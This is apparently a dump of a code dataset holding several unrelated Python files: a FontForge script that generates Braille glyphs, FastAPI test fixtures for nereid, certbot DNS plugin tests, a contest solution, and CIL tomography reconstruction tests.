content stringlengths 5 1.05M |
|---|
__license__ = """
This file is part of Gnu FreeFont.
Gnu FreeFont is free software: you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free Software
Foundation, either version 3 of the License, or (at your option) any later
version.
Gnu FreeFont is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with
Gnu FreeFont. If not, see <http://www.gnu.org/licenses/>.
"""
__author__ = "Stevan White"
__email__ = "stevan.white@googlemail.com"
__copyright__ = "Copyright 2010, Stevan White"
__date__ = "$Date: 2010/09/18 08:50:42 $"
__version__ = "$Revision: 1.6 $"
import fontforge
import psMat
from sys import stdout
__doc__ = """
Replaces the Braille Pattern range in a font. There must already be
characters defined there.
Two auxiliar glyphs, in variables glyphOff and glyphOn below, represent the
off and on state of the Braille dots, respectively.
One also needs to set the font file path, the width between columns of dots,
and the width between rows of dots, as well as the width of the glyphs.
The first 64 Braille Patterns consist of two columns of four dots,
the bottom two of which are all zero. The other 6 dots are represented
by the bit patterns of the octal digits of the offset from the range start.
The remaining three sets of 64 patterns repeat the first set, with
the bottom two dots being the bit pattern for the numbers 1 to 4 in binary.
"""
# Source font, modified in place; the Braille Patterns range is rebuilt below.
font = fontforge.open( '../../sfd/FreeMono.sfd' )
# Names of the two pre-existing helper glyphs referenced for each dot cell.
glyphOff = 'braille_off'
glyphOn = 'braille_on'
# Dot-grid metrics in font units: spacing between dot columns, spacing between
# dot rows (negative: rows run downward), and the advance width of each glyph.
colwidth = 220
rowheight = -220
glyphwidth = 600
def drawdot( g, col, row, on ):
	"""Place one dot reference into glyph g at grid cell (col, row).

	A truthy `on` selects the filled-dot helper glyph, otherwise the
	empty-dot helper; the reference is translated to the cell position.
	"""
	shift = psMat.translate( col * colwidth, row * rowheight )
	dot = glyphOn if on else glyphOff
	g.addReference( dot, shift )
def createAndName( font, off ):
	"""Create (or re-name) the glyph at U+2800+off, named brailleXX in hex."""
	glyphname = 'braille%0.2X' % off
	return font.createChar( 0x2800 + off, glyphname )
def drawtopsix( g, off ):
	# Draw the top six dots (two columns of three rows) of glyph g.
	# The low six bits of `off` give the on/off state: bit (3*col + row),
	# i.e. the octal-digit encoding used by the Braille Patterns block.
	# NOTE: Python-2 print statements — this script is not Python-3 ready.
	print 'created', 'braille%0.2X' % off
	g.clear()
	g.right_side_bearing = glyphwidth
	for col in range ( 0, 2 ):
		for row in range ( 0, 3 ):
			print 'shift', ( 3 * col + row )
			# nonzero when the bit for this cell is set in off
			state = ( 1 << ( 3 * col + row ) ) & off
			drawdot( g, col, row, state )
# Contrary to the FontForge docs, font.createChar does *not* create a
# glyph if one doesn't exist, but *does* re-name it if it already exists.
# Build all 256 Braille Patterns: the six upper dots come from the low six
# bits (drawtopsix); the bottom row holds dots 7 and 8, which are bits 6
# and 7 of the offset.
for off in range ( 0, 0x0100 ):
	g = createAndName( font, off )
	drawtopsix( g, off )
	# Bit tests replace the original `off / 0x40` / `off / 0x80` integer
	# divisions, which relied on Python-2 division semantics; the masks
	# give identical results in Python 2 and stay correct under Python 3.
	drawdot( g, 0, 3, ( off & 0x40 ) != 0 )
	drawdot( g, 1, 3, ( off & 0x80 ) != 0 )
font.save()
|
import json
import time
from itertools import product
import pytest
from fastapi.testclient import TestClient
import networkx as nx
from nereid.main import app
from nereid.core.config import API_LATEST
from nereid.src.network.utils import clean_graph_dict
from nereid.tests.utils import get_payload, generate_n_random_valid_watershed_graphs
@pytest.fixture(scope="module")
def client():
    """Module-scoped FastAPI test client bound to the nereid app."""
    test_client = TestClient(app)
    with test_client:
        yield test_client
@pytest.fixture(scope="module")
def named_validation_responses(client):
    """POST four named graphs (fast/slow x valid/invalid) to the network
    validation route and yield the responses keyed by name."""
    route = API_LATEST + "/network/validate"

    # large generated graphs exercise the slow (deferred) code path
    slow_valid = json.dumps(clean_graph_dict(nx.gnr_graph(15000, p=0.05, seed=42)))
    slow_invalid = json.dumps(clean_graph_dict(nx.gnc_graph(15000, seed=42)))

    payloads = {
        "valid_graph_response_fast": get_payload("network_validate_is_valid.json"),
        "invalid_graph_response_fast": get_payload(
            "network_validate_is_invalid_cycle.json"
        ),
        "valid_graph_response_slow": slow_valid,
        "invalid_graph_response_slow": slow_invalid,
    }

    responses = {
        name: client.post(route, data=payload) for name, payload in payloads.items()
    }
    yield responses
@pytest.fixture(scope="module")
def named_subgraph_responses(client):
    """POST a fast and a slow subgraph request and yield responses by name.

    For the fast request the rendered SVG is requested up front so later
    tests can GET it without waiting.
    """
    route = API_LATEST + "/network/subgraph"

    slow_graph = clean_graph_dict(nx.gnr_graph(200, p=0.05, seed=42))
    nodes = [{"id": "3"}, {"id": "29"}, {"id": "18"}]

    requests = [
        # name, payload (file fixture or built object), is-fast
        ("subgraph_response_fast", get_payload("network_subgraph_request.json"), True),
        ("subgraph_response_slow", json.dumps(dict(graph=slow_graph, nodes=nodes)), False),
    ]

    responses = {}
    for name, payload, is_fast in requests:
        resp = client.post(route, data=payload)
        responses[name] = resp
        result_route = resp.json()["result_route"]
        if is_fast:
            # trigger the svg render here so it's ready to get later.
            client.get(result_route + "/img?media_type=svg")
            time.sleep(0.5)
    yield responses
@pytest.fixture(scope="module")
def solution_sequence_response(client):
    """POST every (min_branch_size, n_graphs, size-range) combination to the
    solution-sequence route; pre-renders the SVG for one fixed combination."""
    route = API_LATEST + "/network/solution_sequence"

    branch_sizes = [2, 6, 10, 50]
    graph_counts = [1, 3, 5, 10]
    size_ranges = [(10, 11), (20, 40)]

    responses = {}
    for bs, ngraph, minmax in product(branch_sizes, graph_counts, size_ranges):
        graph = generate_n_random_valid_watershed_graphs(ngraph, *minmax)
        payload = json.dumps(clean_graph_dict(graph))
        response = client.post(route + f"?min_branch_size={bs}", data=payload)
        responses[(bs, ngraph, minmax)] = response

        if (bs, ngraph, minmax) == (6, 3, (10, 11)):
            # warm the svg render for this one combination
            result_route = response.json()["result_route"]
            client.get(result_route + "/img?media_type=svg")
            time.sleep(0.5)
    yield responses
@pytest.fixture(scope="module")
def land_surface_loading_responses(client, land_surface_loading_response_dicts):
    """POST each land-surface request fixture with details on and off; yield
    responses keyed by (details-flag, nrows, nnodes)."""
    responses = {}
    for detail_tf, ((nrows, nnodes), ls_request) in product(
        ["true", "false"], land_surface_loading_response_dicts.items()
    ):
        route = f"{API_LATEST}/land_surface/loading?details={detail_tf}"
        responses[(detail_tf, nrows, nnodes)] = client.post(
            route, data=json.dumps(ls_request)
        )
    yield responses
@pytest.fixture(scope="module")
def treatment_facility_responses(client, valid_treatment_facility_dicts):
    """Validate each treatment-facility fixture individually; yield the
    responses keyed by facility name."""
    route = API_LATEST + "/treatment_facility/validate"
    responses = {
        name: client.post(route, data=json.dumps({"treatment_facilities": [dct]}))
        for name, dct in valid_treatment_facility_dicts.items()
    }
    yield responses
|
"""Tests for certbot_dns_dnsimple.dns_dnsimple."""
import unittest
import mock
from requests.exceptions import HTTPError
from certbot.compat import os
from certbot.plugins import dns_test_common
from certbot.plugins import dns_test_common_lexicon
from certbot.tests import util as test_util
API_ID = 12345
API_TOKEN = 'foo'
class AuthenticatorTest(test_util.TempDirTestCase,
                        dns_test_common_lexicon.BaseLexiconAuthenticatorTest):
    """Lexicon-based authenticator tests run against a mocked DNS client."""

    def setUp(self):
        super(AuthenticatorTest, self).setUp()

        from certbot_dns_verifier.dns_verifier import Authenticator

        credentials_path = os.path.join(self.tempdir, 'file.ini')
        dns_test_common.write(
            {"verifier_api_id": API_ID, "verifier_api_token": API_TOKEN},
            credentials_path,
        )

        # zero propagation delay: don't wait during tests
        self.config = mock.MagicMock(verifier_credentials=credentials_path,
                                     verifier_propagation_seconds=0)

        self.auth = Authenticator(self.config, "verifier")

        # replace the real client factory with a mock
        # _get_dns_client | pylint: disable=protected-access
        self.mock_client = mock.MagicMock()
        self.auth._get_dns_client = mock.MagicMock(return_value=self.mock_client)
class DNSimpleLexiconClientTest(unittest.TestCase, dns_test_common_lexicon.BaseLexiconClientTest):
    """Lexicon client tests with the provider replaced by a mock."""

    # error the base suite expects on bad credentials
    LOGIN_ERROR = HTTPError('401 Client Error: Unauthorized for url: ...')

    def setUp(self):
        from certbot_dns_verifier.dns_verifier import _DNSLexiconClient

        self.client = _DNSLexiconClient(API_ID, API_TOKEN, 0)

        self.provider_mock = mock.MagicMock()
        self.client.provider = self.provider_mock
# Allow running this test module directly with the stdlib runner.
if __name__ == "__main__":
    unittest.main()  # pragma: no cover
# For each case: choose P of the N values and pay (max_of_window - s) for each
# chosen s to equalise them.  After sorting descending, the optimal choice is a
# contiguous window whose maximum is its first element; slide the window and
# update the cost incrementally.
T = int(input())
for x in range(1, T + 1):
    N, P = map(int, input().split())
    S = map(int, input().split())
    S = sorted(S, reverse = True)
    # cost of the first window S[0:P], whose maximum is S[0]
    y = hours = sum(S[0] - s for s in S[:P])
    for i in range(1, N - P + 1):
        # window max drops from S[i-1] to S[i]: the P-1 retained members
        # each get cheaper by the difference...
        hours -= (S[i - 1] - S[i]) * (P - 1)
        # ...and the departing zero-cost head is swapped for the new tail.
        hours += S[i] - S[P + i - 1]
        if hours < y:
            y = hours
    # flush=True: interactive-judge-safe output
    print("Case #{}: {}".format(x, y), flush = True)
|
# -*- coding: utf-8 -*-
# This work is part of the Core Imaging Library (CIL) developed by CCPi
# (Collaborative Computational Project in Tomographic Imaging), with
# substantial contributions by UKRI-STFC and University of Manchester.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from cil.framework import AcquisitionGeometry
from cil.utilities.dataexample import SIMULATED_PARALLEL_BEAM_DATA, SIMULATED_CONE_BEAM_DATA, SIMULATED_SPHERE_VOLUME
import unittest
from scipy.fft import fft, ifft
import numpy as np
from utils import has_tigre, has_gpu_tigre, has_ipp
import gc
if has_tigre:
from cil.plugins.tigre import ProjectionOperator as ProjectionOperator
from cil.plugins.tigre import FBP as FBP_tigre
from tigre.utilities.filtering import ramp_flat, filter
from cil.recon.Reconstructor import Reconstructor # checks on baseclass
from cil.recon.FBP import GenericFilteredBackProjection # checks on baseclass
from cil.recon import FDK, FBP
# Probe for a usable TIGRE GPU once at import time; the GPU-dependent result
# tests skip themselves when this is False.
has_tigre_gpu = has_gpu_tigre()
if not has_tigre_gpu:
    print("Unable to run TIGRE tests")
class Test_Reconstructor(unittest.TestCase):
    """Tests for the Reconstructor base class: input bookkeeping, geometry
    defaults, weakly-held input data and backend validation."""

    def setUp(self):
        #%% Setup Geometry
        voxel_num_xy = 255
        voxel_num_z = 15

        # cone-beam system, magnification 2, detector matched to the volume
        mag = 2
        src_to_obj = 50
        src_to_det = src_to_obj * mag

        pix_size = 0.2
        det_pix_x = voxel_num_xy
        det_pix_y = voxel_num_z

        num_projections = 1000
        angles = np.linspace(0, 360, num=num_projections, endpoint=False)

        self.ag = AcquisitionGeometry.create_Cone2D([0,-src_to_obj],[0,src_to_det-src_to_obj])\
            .set_angles(angles)\
            .set_panel(det_pix_x, pix_size)\
            .set_labels(['angle','horizontal'])
        self.ig = self.ag.get_ImageGeometry()

        self.ag3D = AcquisitionGeometry.create_Cone3D([0,-src_to_obj,0],[0,src_to_det-src_to_obj,0])\
            .set_angles(angles)\
            .set_panel((det_pix_x,det_pix_y), (pix_size,pix_size))\
            .set_labels(['angle','vertical','horizontal'])
        self.ig3D = self.ag3D.get_ImageGeometry()
        self.ad3D = self.ag3D.allocate('random')
        # NOTE(review): duplicate of the assignment two lines above.
        self.ig3D = self.ag3D.get_ImageGeometry()

    @unittest.skipUnless(has_tigre, "TIGRE not installed")
    def test_defaults(self):
        """A new Reconstructor holds the input and derives geometry/backend."""
        reconstructor = Reconstructor(self.ad3D)
        self.assertEqual(id(reconstructor.input), id(self.ad3D))
        self.assertEqual(reconstructor.image_geometry, self.ig3D)
        self.assertEqual(reconstructor.backend, 'tigre')

    @unittest.skipUnless(has_tigre, "TIGRE not installed")
    def test_set_input(self):
        """set_input accepts matching data and rejects mismatched geometry."""
        reconstructor = Reconstructor(self.ad3D)
        self.assertEqual(id(reconstructor.input), id(self.ad3D))

        ag3D_new = self.ad3D.copy()
        reconstructor.set_input(ag3D_new)
        self.assertEqual(id(reconstructor.input), id(ag3D_new))

        # a single slice no longer matches the configured 3D geometry
        ag3D_new = self.ad3D.get_slice(vertical='centre')
        with self.assertRaises(ValueError):
            reconstructor.set_input(ag3D_new)

        # constructing from a geometry (not acquisition data) must fail
        with self.assertRaises(TypeError):
            reconstructor = Reconstructor(self.ag3D)

    @unittest.skipUnless(has_tigre, "TIGRE not installed")
    def test_weak_input(self):
        """Accessing input after the data is garbage-collected raises; the
        behaviour here is consistent with the input being held weakly."""
        data = self.ad3D.copy()
        reconstructor = Reconstructor(data)
        self.assertEqual(id(reconstructor.input), id(data))

        del data
        gc.collect()
        with self.assertRaises(ValueError):
            reconstructor.input

        reconstructor.set_input(self.ad3D)
        self.assertEqual(id(reconstructor.input), id(self.ad3D))

    @unittest.skipUnless(has_tigre, "TIGRE not installed")
    def test_set_image_data(self):
        """set_image_geometry stores the (modified) reconstruction window."""
        reconstructor = Reconstructor(self.ad3D)
        self.ig3D.voxel_num_z = 1
        reconstructor.set_image_geometry(self.ig3D)
        self.assertEqual(reconstructor.image_geometry, self.ig3D)

    @unittest.skipUnless(has_tigre, "TIGRE not installed")
    def test_set_backend(self):
        """Unknown backends and data ordered for another backend are rejected."""
        reconstructor = Reconstructor(self.ad3D)
        with self.assertRaises(ValueError):
            reconstructor.set_backend('gemma')

        # data reordered for astra is incompatible with the tigre default
        self.ad3D.reorder('astra')
        with self.assertRaises(ValueError):
            reconstructor = Reconstructor(self.ad3D)
class Test_GenericFilteredBackProjection(unittest.TestCase):
    """Tests for the GenericFilteredBackProjection base class: filter array,
    fft order, in-place filtering flag and reset()."""

    def setUp(self):
        #%% Setup Geometry (small sizes: these tests don't reconstruct)
        voxel_num_xy = 16
        voxel_num_z = 4

        mag = 2
        src_to_obj = 50
        src_to_det = src_to_obj * mag

        pix_size = 0.2
        det_pix_x = voxel_num_xy
        det_pix_y = voxel_num_z

        num_projections = 36
        angles = np.linspace(0, 360, num=num_projections, endpoint=False)

        self.ag = AcquisitionGeometry.create_Cone2D([0,-src_to_obj],[0,src_to_det-src_to_obj])\
            .set_angles(angles)\
            .set_panel(det_pix_x, pix_size)\
            .set_labels(['angle','horizontal'])
        self.ig = self.ag.get_ImageGeometry()

        self.ag3D = AcquisitionGeometry.create_Cone3D([0,-src_to_obj,0],[0,src_to_det-src_to_obj,0])\
            .set_angles(angles)\
            .set_panel((det_pix_x,det_pix_y), (pix_size,pix_size))\
            .set_labels(['angle','vertical','horizontal'])
        self.ig3D = self.ag3D.get_ImageGeometry()
        self.ad3D = self.ag3D.allocate('random')
        # NOTE(review): duplicate of the assignment two lines above.
        self.ig3D = self.ag3D.get_ImageGeometry()

    # NOTE(review): skipUnless on this non-test helper makes a *call* to it
    # raise SkipTest when TIGRE is absent — confirm that is intended.
    @unittest.skipUnless(has_tigre, "TIGRE not installed")
    def check_defaults(self, reconstructor):
        """Assert the reconstructor is in its pristine default state."""
        self.assertEqual(reconstructor.filter, 'ram-lak')
        self.assertEqual(reconstructor.fft_order, 8)
        self.assertFalse(reconstructor.filter_inplace)
        self.assertIsNone(reconstructor._weights)

        # default filter: 2**8 samples, zero at DC, peak at centre, symmetric
        filter = reconstructor.get_filter_array()
        self.assertEqual(type(filter), np.ndarray)
        self.assertEqual(len(filter), 2**8)
        self.assertEqual(filter[0], 0)
        self.assertEqual(filter[128], 1.0)
        self.assertEqual(filter[1], filter[255])
        self.assertEqual(reconstructor.image_geometry, self.ig3D)

    @unittest.skipUnless(has_tigre and has_ipp, "TIGRE or IPP not installed")
    def test_defaults(self):
        """A freshly-constructed reconstructor has the documented defaults."""
        reconstructor = GenericFilteredBackProjection(self.ad3D)
        self.check_defaults(reconstructor)

    @unittest.skipUnless(has_tigre and has_ipp, "TIGRE or IPP not installed")
    def test_reset(self):
        """reset() must undo every customisation back to the defaults."""
        reconstructor = GenericFilteredBackProjection(self.ad3D)

        reconstructor.set_fft_order(10)
        arr = reconstructor.get_filter_array()
        arr.fill(0)
        reconstructor.set_filter(arr)

        ig = self.ig3D.copy()
        ig.num_voxels_x = 4
        reconstructor.set_image_geometry(ig)

        reconstructor.set_filter_inplace(True)

        reconstructor.reset()
        self.check_defaults(reconstructor)

    @unittest.skipUnless(has_tigre and has_ipp, "TIGRE or IPP not installed")
    def test_set_filter(self):
        """set_filter accepts a correctly-sized array and rejects others."""
        reconstructor = GenericFilteredBackProjection(self.ad3D)
        with self.assertRaises(ValueError):
            reconstructor.set_filter("gemma")

        filter = reconstructor.get_filter_array()
        filter_new = filter * 0.5
        reconstructor.set_filter(filter_new)
        self.assertEqual(reconstructor.filter, 'custom')

        filter = reconstructor.get_filter_array()
        np.testing.assert_array_equal(filter, filter_new)

        # a wrong-length filter must be rejected
        with self.assertRaises(ValueError):
            reconstructor.set_filter(filter[1:-1])

    @unittest.skipUnless(has_tigre and has_ipp, "TIGRE or IPP not installed")
    def test_set_fft_order(self):
        """fft_order is settable but has a lower bound."""
        reconstructor = GenericFilteredBackProjection(self.ad3D)
        reconstructor.set_fft_order(10)
        self.assertEqual(reconstructor.fft_order, 10)

        with self.assertRaises(ValueError):
            reconstructor.set_fft_order(2)

    @unittest.skipUnless(has_tigre and has_ipp, "TIGRE or IPP not installed")
    def test_set_filter_inplace(self):
        """filter_inplace accepts booleans only."""
        reconstructor = GenericFilteredBackProjection(self.ad3D)
        reconstructor.set_filter_inplace(True)
        self.assertTrue(reconstructor.filter_inplace)

        with self.assertRaises(TypeError):
            reconstructor.set_filter_inplace('gemma')
class Test_FDK(unittest.TestCase):
    """Unit tests for the FDK reconstructor: filter/geometry interaction,
    hand-computed pre-filtering and cone-beam weights."""

    def setUp(self):
        #%% Setup Geometry (small sizes: these tests don't reconstruct)
        voxel_num_xy = 16
        voxel_num_z = 4

        mag = 2
        src_to_obj = 50
        src_to_det = src_to_obj * mag

        pix_size = 0.2
        det_pix_x = voxel_num_xy
        det_pix_y = voxel_num_z

        num_projections = 36
        angles = np.linspace(0, 360, num=num_projections, endpoint=False)

        self.ag = AcquisitionGeometry.create_Cone2D([0,-src_to_obj],[0,src_to_det-src_to_obj])\
            .set_angles(angles)\
            .set_panel(det_pix_x, pix_size)\
            .set_labels(['angle','horizontal'])
        self.ig = self.ag.get_ImageGeometry()

        self.ag3D = AcquisitionGeometry.create_Cone3D([0,-src_to_obj,0],[0,src_to_det-src_to_obj,0])\
            .set_angles(angles)\
            .set_panel((det_pix_x,det_pix_y), (pix_size,pix_size))\
            .set_labels(['angle','vertical','horizontal'])
        self.ig3D = self.ag3D.get_ImageGeometry()
        self.ad3D = self.ag3D.allocate('random')
        # NOTE(review): duplicate of the assignment two lines above.
        self.ig3D = self.ag3D.get_ImageGeometry()

    @unittest.skipUnless(has_tigre and has_ipp, "TIGRE or IPP not installed")
    def test_set_filter(self):
        """Changing fft_order after a custom filter invalidates the filter."""
        reconstructor = FDK(self.ad3D)
        filter = reconstructor.get_filter_array()
        filter_new = filter * 0.5
        reconstructor.set_filter(filter_new)
        reconstructor.set_fft_order(10)
        with self.assertRaises(ValueError):
            reconstructor._pre_filtering(self.ad3D)

    @unittest.skipUnless(has_tigre and has_ipp, "Prerequisites not met")
    def test_filtering(self):
        """_pre_filtering must match a by-hand weight + zero-pad + FFT filter."""
        ag = AcquisitionGeometry.create_Cone3D([0,-1,0],[0,2,0])\
            .set_panel([64,3],[0.1,0.1])\
            .set_angles([0,90])

        ad = ag.allocate('random', seed=0)

        reconstructor = FDK(ad)
        out1 = ad.copy()
        reconstructor._pre_filtering(out1)

        #by hand
        filter = reconstructor.get_filter_array()
        reconstructor._calculate_weights(ag)
        # symmetric zero-padding of each projection row up to the filter length
        pad0 = (len(filter) - ag.pixel_num_h) // 2
        pad1 = len(filter) - ag.pixel_num_h - pad0

        out2 = ad.array.copy()
        out2 *= reconstructor._weights
        for i in range(2):
            proj_padded = np.zeros((ag.pixel_num_v, len(filter)))
            proj_padded[:, pad0:-pad1] = out2[i]
            filtered_proj = fft(proj_padded, axis=-1)
            filtered_proj *= filter
            filtered_proj = ifft(filtered_proj, axis=-1)
            out2[i] = np.real(filtered_proj)[:, pad0:-pad1]

        diff = (out1 - out2).abs().max()
        self.assertLess(diff, 1e-5)

    @unittest.skipUnless(has_tigre and has_ipp, "TIGRE or IPP not installed")
    def test_weights(self):
        """FDK weights must equal the analytic cosine (z/ray-length) weights."""
        ag = AcquisitionGeometry.create_Cone3D([0,-1,0],[0,2,0])\
            .set_panel([3,4],[0.1,0.2])\
            .set_angles([0,90])
        ad = ag.allocate(0)

        reconstructor = FDK(ad)
        reconstructor._calculate_weights(ag)
        weights = reconstructor._weights

        # expected scaling for this 2-angle geometry
        scaling = 7.5 * np.pi
        weights_new = np.ones_like(weights)

        det_size_x = ag.pixel_size_h * ag.pixel_num_h
        det_size_y = ag.pixel_size_v * ag.pixel_num_v

        # source-to-detector distance for this geometry
        ray_length_z = 3
        for j in range(4):
            ray_length_y = -det_size_y/2 + ag.pixel_size_v * (j+0.5)
            for i in range(3):
                ray_length_x = -det_size_x/2 + ag.pixel_size_h * (i+0.5)
                ray_length = (ray_length_x**2 + ray_length_y**2 + ray_length_z**2)**0.5
                weights_new[j,i] = scaling * ray_length_z / ray_length

        diff = np.max(np.abs(weights - weights_new))
        self.assertLess(diff, 1e-5)
class Test_FBP(unittest.TestCase):
    """Unit tests for the parallel-beam FBP reconstructor: filter handling,
    chunked (split) processing, by-hand filtering and scalar weights."""

    def setUp(self):
        #%% Setup Geometry (small sizes: these tests don't reconstruct)
        voxel_num_xy = 16
        voxel_num_z = 4

        pix_size = 0.2
        det_pix_x = voxel_num_xy
        det_pix_y = voxel_num_z

        num_projections = 36
        angles = np.linspace(0, 360, num=num_projections, endpoint=False)

        self.ag = AcquisitionGeometry.create_Parallel2D()\
            .set_angles(angles)\
            .set_panel(det_pix_x, pix_size)\
            .set_labels(['angle','horizontal'])
        self.ig = self.ag.get_ImageGeometry()

        self.ag3D = AcquisitionGeometry.create_Parallel3D()\
            .set_angles(angles)\
            .set_panel((det_pix_x,det_pix_y), (pix_size,pix_size))\
            .set_labels(['angle','vertical','horizontal'])
        self.ig3D = self.ag3D.get_ImageGeometry()
        self.ad3D = self.ag3D.allocate('random')
        # NOTE(review): duplicate of the assignment two lines above.
        self.ig3D = self.ag3D.get_ImageGeometry()

    @unittest.skipUnless(has_tigre and has_ipp, "TIGRE or IPP not installed")
    def test_set_filter(self):
        """Changing fft_order after a custom filter invalidates the filter."""
        reconstructor = FBP(self.ad3D)
        filter = reconstructor.get_filter_array()
        filter_new = filter * 0.5
        reconstructor.set_filter(filter_new)
        reconstructor.set_fft_order(10)
        with self.assertRaises(ValueError):
            reconstructor._pre_filtering(self.ad3D)

    @unittest.skipUnless(has_tigre and has_ipp, "TIGRE or IPP not installed")
    def test_split_processing(self):
        """slices_per_chunk defaults to 0, is settable, and reset() clears it."""
        reconstructor = FBP(self.ad3D)
        self.assertEqual(reconstructor.slices_per_chunk, 0)

        reconstructor.set_split_processing(1)
        self.assertEqual(reconstructor.slices_per_chunk, 1)

        reconstructor.reset()
        self.assertEqual(reconstructor.slices_per_chunk, 0)

    @unittest.skipUnless(has_tigre and has_ipp, "Prerequisites not met")
    def test_filtering(self):
        """_pre_filtering must match a by-hand weight + zero-pad + FFT filter."""
        ag = AcquisitionGeometry.create_Parallel3D()\
            .set_panel([64,3],[0.1,0.1])\
            .set_angles([0,90])

        ad = ag.allocate('random', seed=0)

        reconstructor = FBP(ad)
        out1 = ad.copy()
        reconstructor._pre_filtering(out1)

        #by hand
        filter = reconstructor.get_filter_array()
        reconstructor._calculate_weights(ag)
        # symmetric zero-padding of each projection row up to the filter length
        pad0 = (len(filter) - ag.pixel_num_h) // 2
        pad1 = len(filter) - ag.pixel_num_h - pad0

        out2 = ad.array.copy()
        out2 *= reconstructor._weights
        for i in range(2):
            proj_padded = np.zeros((ag.pixel_num_v, len(filter)))
            proj_padded[:, pad0:-pad1] = out2[i]
            filtered_proj = fft(proj_padded, axis=-1)
            filtered_proj *= filter
            filtered_proj = ifft(filtered_proj, axis=-1)
            out2[i] = np.real(filtered_proj)[:, pad0:-pad1]

        diff = (out1 - out2).abs().max()
        self.assertLess(diff, 1e-5)

    @unittest.skipUnless(has_tigre and has_ipp, "TIGRE or IPP not installed")
    def test_weights(self):
        """Parallel-beam weights are a single scalar over the whole panel."""
        ag = AcquisitionGeometry.create_Parallel3D()\
            .set_panel([3,4],[0.1,0.2])\
            .set_angles([0,90])
        ad = ag.allocate(0)

        reconstructor = FBP(ad)
        reconstructor._calculate_weights(ag)
        weights = reconstructor._weights

        scaling = (2 * np.pi / ag.num_projections) / (4 * ag.pixel_size_h)
        weights_new = np.ones_like(weights) * scaling

        np.testing.assert_allclose(weights, weights_new)
class Test_FDK_results(unittest.TestCase):
    """End-to-end FDK reconstructions on simulated cone-beam data, compared
    against the known sphere volume and against TIGRE's own FBP."""

    def setUp(self):
        self.acq_data = SIMULATED_CONE_BEAM_DATA.get()
        self.img_data = SIMULATED_SPHERE_VOLUME.get()

        # convert transmission measurements to attenuation: -log(data)
        self.acq_data = np.log(self.acq_data)
        self.acq_data *= -1.0

        self.ig = self.img_data.geometry
        self.ag = self.acq_data.geometry

    @unittest.skipUnless(has_tigre and has_tigre_gpu and has_ipp, "TIGRE or IPP not installed")
    def test_results_3D(self):
        """3D reconstruction matches ground truth; out= path matches return."""
        reconstructor = FDK(self.acq_data)

        reco = reconstructor.run(verbose=0)
        np.testing.assert_allclose(reco.as_array(), self.img_data.as_array(), atol=1e-3)

        reco2 = reco.copy()
        reco2.fill(0)
        reconstructor.run(out=reco2, verbose=0)
        np.testing.assert_allclose(reco.as_array(), reco2.as_array(), atol=1e-8)

    @unittest.skipUnless(has_tigre and has_tigre_gpu and has_ipp, "TIGRE or IPP not installed")
    def test_results_2D(self):
        """Central-slice 2D reconstruction matches the 2D ground truth."""
        data2D = self.acq_data.get_slice(vertical='centre')
        img_data2D = self.img_data.get_slice(vertical='centre')

        reconstructor = FDK(data2D)
        reco = reconstructor.run(verbose=0)
        np.testing.assert_allclose(reco.as_array(), img_data2D.as_array(), atol=1e-3)

        reco2 = reco.copy()
        reco2.fill(0)
        reconstructor.run(out=reco2, verbose=0)
        np.testing.assert_allclose(reco.as_array(), reco2.as_array(), atol=1e-8)

    @unittest.skipUnless(has_tigre and has_tigre_gpu and has_ipp, "TIGRE or IPP not installed")
    def test_results_with_tigre(self):
        """With TIGRE's own ram-lak filter, CIL's FDK matches TIGRE's FBP."""
        fbp_tigre = FBP_tigre(self.ig, self.ag)
        reco_tigre = fbp_tigre(self.acq_data)

        #fbp CIL with TIGRE's filter
        reconstructor_cil = FDK(self.acq_data)
        n = 2**reconstructor_cil.fft_order
        # build TIGRE's ram-lak filter at the same length
        ramp = ramp_flat(n)
        filt = filter('ram_lak', ramp[0], n, 1, False)

        reconstructor_cil = FDK(self.acq_data)
        reconstructor_cil.set_filter(filt)
        reco_cil = reconstructor_cil.run(verbose=0)

        #with the same filter results should be virtually identical
        np.testing.assert_allclose(reco_cil.as_array(), reco_tigre.as_array(), atol=1e-8)

    @unittest.skipUnless(has_tigre and has_tigre_gpu and has_ipp, "TIGRE or IPP not installed")
    def test_results_inplace_filtering(self):
        """filter_inplace=True must visibly modify the input acquisition data."""
        reconstructor = FDK(self.acq_data)
        reco = reconstructor.run(verbose=0)

        data_filtered = self.acq_data.copy()
        reconstructor_inplace = FDK(data_filtered)
        reconstructor_inplace.set_filter_inplace(True)
        reconstructor_inplace.run(out=reco, verbose=0)

        diff = (data_filtered - self.acq_data).abs().mean()
        self.assertGreater(diff, 0.8)
class Test_FBP_results(unittest.TestCase):
    """End-to-end FBP reconstructions on simulated parallel-beam data,
    including the chunked (split) processing path."""

    def setUp(self):
        self.acq_data = SIMULATED_PARALLEL_BEAM_DATA.get()
        self.img_data = SIMULATED_SPHERE_VOLUME.get()

        # convert transmission measurements to attenuation: -log(data)
        self.acq_data = np.log(self.acq_data)
        self.acq_data *= -1.0

        self.ig = self.img_data.geometry
        self.ag = self.acq_data.geometry

    @unittest.skipUnless(has_tigre and has_tigre_gpu and has_ipp, "TIGRE or IPP not installed")
    def test_results_3D(self):
        """3D reconstruction matches ground truth; out= path matches return."""
        reconstructor = FBP(self.acq_data)

        reco = reconstructor.run(verbose=0)
        np.testing.assert_allclose(reco.as_array(), self.img_data.as_array(), atol=1e-3)

        reco2 = reco.copy()
        reco2.fill(0)
        reconstructor.run(out=reco2, verbose=0)
        np.testing.assert_allclose(reco.as_array(), reco2.as_array(), atol=1e-8)

    @unittest.skipUnless(has_tigre and has_tigre_gpu and has_ipp, "TIGRE or IPP not installed")
    def test_results_3D_split(self):
        """Slice-by-slice (split) processing gives the same result as one pass."""
        reconstructor = FBP(self.acq_data)
        reconstructor.set_split_processing(1)

        reco = reconstructor.run(verbose=0)
        np.testing.assert_allclose(reco.as_array(), self.img_data.as_array(), atol=1e-3)

        reco2 = reco.copy()
        reco2.fill(0)
        reconstructor.run(out=reco2, verbose=0)
        np.testing.assert_allclose(reco.as_array(), reco2.as_array(), atol=1e-8)

